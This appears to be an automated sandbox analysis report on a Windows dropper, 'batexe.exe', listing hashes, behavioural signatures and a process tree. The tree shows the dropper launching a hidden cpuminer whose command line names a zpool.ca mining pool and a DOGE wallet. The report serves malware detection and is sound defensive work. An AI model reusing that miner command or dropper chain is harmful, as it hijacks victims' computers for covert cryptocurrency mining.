Analysis
-
max time kernel
294s -
max time network
288s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
14-02-2024 05:56
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231220-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 264 b2e.exe 1516 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1516 cpuminer-sse2.exe 1516 cpuminer-sse2.exe 1516 cpuminer-sse2.exe 1516 cpuminer-sse2.exe 1516 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/552-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 552 wrote to memory of 264 552 batexe.exe 85 PID 552 wrote to memory of 264 552 batexe.exe 85 PID 552 wrote to memory of 264 552 batexe.exe 85 PID 264 wrote to memory of 4996 264 b2e.exe 86 PID 264 wrote to memory of 4996 264 b2e.exe 86 PID 264 wrote to memory of 4996 264 b2e.exe 86 PID 4996 wrote to memory of 1516 4996 cmd.exe 89 PID 4996 wrote to memory of 1516 4996 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B96D.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1516
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.9MB
MD55c676116b562c9b7c2a7215489e90fea
SHA1909811d0ad9c8749a4b586ab6fbc850eb7515f3b
SHA2569599767de73c000ac67b085269d7fbf45107dfa032a26481791145cbfdfb2329
SHA512457fb1ad82bee1e36fe8ae60ac06cd2adfe391806854194b5195ae1cef631879fd81d26c2626fa54c8e66e757645a305de19399117b3da8e89d098d02b9722e1
-
Filesize
2.9MB
MD5defed2f7ad0e767916ef430e66ece38d
SHA1e9a731bc250b18ad093f0d2677599ccd55c814e4
SHA2568a645d1b0fd118279f025eb7e2b63b092149d33eb676df5a6609811904b9751b
SHA512d0072adb91157c777bda13faa8850553b3cb9ad7ae95c5194b46015de83d82d5b0e2c4e8e29d8001998b219c5aadaf865b17bbeb5c71de644bd7315b215ad28b
-
Filesize
2.5MB
MD5c1da5eee745ae0265801bd6327a17115
SHA1ee17ca1151e40012c1a681c5b517229622c10f63
SHA256292822a7c70d829f2a4e238e5644c00ce1d17006bf4b67151be4de72da42d230
SHA512c959283d1522072398e87079c2648262a920468c2c444e334aae118ae050566c432975c8d2f129fd436da64311d0f8229cb2f1e3dd010ec011fdb6d6d0640c1f
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.3MB
MD5c56dc974241dcb5de3e455838540824a
SHA1eb7be92302130cbd5cfbfbcc25bf5f5192e8387a
SHA256c6e2b580e8e9e274cf386362e096f570ff6bf7449867775b2b432923773272b7
SHA512cdc49651ec0010e5158cda48aff9c242cdec62c00a387a582a7117140b2d781a3def554e365663bf676c97008c7bd185cb30dbf3cd7c99515eed2e7759946ac1
-
Filesize
1.5MB
MD551ded32f1b8419f3664f812db972b8af
SHA1a9e2dc9c6a7f32f5824e7bf10b5b04e7297d31b0
SHA2569a848ab6668acc7e619166ce17ea82e9c1a7677887731ac9085a5cf95ab13ea5
SHA512aa1d9a60cb877204d4a1fdf6657670cb1448ed39638ab4e32bc779db772883373dacc8185dc4d0f7cc28a9577d1472ab4bb4e0e92aa8934cd4dc3ba81ea0172a
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.5MB
MD5162a0b6a19e42bafe25c3e000b6f244d
SHA17b89ea1ece504dabd4b39f9060707b1f8c89e566
SHA2568fd8d9ea82d04dcf098b951e73f408bce33b6e1115045dad52bb40c7a9234fdd
SHA512e3e4ce45233617c3177fed38a7322aeafef789c086b80cd1d738542961098341cbe1fa119804384ad31cc159870898a6c6f1bc1341dc5a8ed06230f130afbd30
-
Filesize
910KB
MD51262371f999fc577f10b041459232250
SHA18551d3512550b6d91fd5a4fb84d307228d8ea01b
SHA256f340dce06ca82dd4d4b30c42c4ff67474816f8e33c22627625c7c09a2daa3c2e
SHA51299f8fe6559f5cea8c69216ee626f4a802c68676efe5b59cfc2fabdea79a7aa7f907cd3739a1a7787e8a790d1b4420ec77ef1ffbeea393fd6423392064ac2885e
-
Filesize
855KB
MD5cfd555770d48d478ac00e49b6a1764f3
SHA1b6e987942c0a79e84d548a2a042ff7aed4512f59
SHA2566c518d09e545bcff6473c5709517e26aaa8153c3a9d268c0e23db1abe1cf815f
SHA512fb415c74e94d61ce750361b25c53b3f8cf43f017f4215b9922c94f852cc135da044b886f31fb6f1f235fe22519d281f58556a112a410faec94d0fde9addf0006
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770